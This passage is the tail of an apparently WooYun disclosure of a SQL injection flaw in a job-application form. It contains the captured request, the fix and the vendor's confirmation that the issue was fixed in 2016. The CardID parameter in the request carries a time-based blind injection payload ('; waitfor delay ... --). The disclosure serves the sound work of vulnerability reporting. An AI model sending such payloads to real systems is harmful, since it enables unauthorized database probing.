BirthdayDay=1&BirthdayYear=01/01/1967&CardID=lI1a0BjE';%20waitfor%20delay%20'0:0:0'%20--%20&child=%e5%ad%90&City=&ComputerLevel=Acunetix&Edu=1&EduLength=1&Edulevel=1&Edus=1&EduSpecialtys=1&EduStartEndDates=01/01/1967&Email=sample%40email.tst&FamilyName=nmiirptj&FamilyPosition=1&FamilyRelation=%e7%88%b6&FamilyUnit=1&Fertility=%e6%9c%aa%e8%82%b2&ForeignLanguageLevel=english&Height=1&JobID=103566&JoinPartyDate=01/01/1967&LearnForm=%e5%85%a8%e6%97%a5%e5%88%b6&MaritalStateid=%e6%9c%aa%e5%a9%9a&Name=nmiirptj&Nation=1&Other=1&Partisan=1&Photo=&PoliticalStateid=%e6%97%a0&Province=&rdoCouple=%e5%a4%ab&RecruitmentWay=1&RegisteredAddress=3137%20Laguna%20Street&Research=&School=1&Schools=1&Sex=%e7%94%b7&siblings1=&siblings2=&siblings3=&Specialty=1&TechnicalQualifications=1&Tel=555-666-0606&TemplateFilePath=&Training=1&txtfile=&WorkJobs=1&WorkReason=1&WorkRelatives=1&WorkStartEndDates=01/01/1967&WorkUnits=1

QQ拼音截图未命名.png


2.png


3.png


4.png


修复方案:

修复注入漏洞

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2016-05-24 08:06

厂商回复:

感谢!

最新状态:

2016-05-24:开发商成已经修复。


漏洞评价:

评价